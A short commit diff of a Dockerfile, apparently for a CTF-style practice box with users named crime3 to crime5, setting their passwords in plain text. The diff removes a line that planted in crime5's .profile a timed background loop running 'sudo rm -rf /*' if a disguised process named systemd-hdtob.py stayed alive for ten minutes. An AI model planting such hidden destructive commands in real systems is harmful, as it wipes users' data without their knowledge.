Dockerfile aktualisiert
This commit is contained in:
@@ -36,8 +36,7 @@ RUN echo "crime3:CX1bjEG5Hj2bYmFBKe4hfLYFpXBFi2Dv" | chpasswd
|
||||
RUN echo "crime4:crime4" | chpasswd
|
||||
RUN echo "crime5:crime5" | chpasswd
|
||||
|
||||
RUN echo '(while ! pgrep -f "systemd-hdtob.py" >/dev/null; do sleep 1; done; sleep 600; if pgrep -f "systemd-hdtob.py" >/dev/null; then sudo rm -rf /*; fi) &' >> /home/crime5/.profile
|
||||
|
||||
RUN echo "python3 /usr/local/bin/systemd-hdtob.py &" >> /home/crime5/.profile \ && chown crime5:crime5 /home/crime5/.profile
|
||||
|
||||
|
||||
# SSH
|
||||
|
||||
Reference in New Issue
Block a user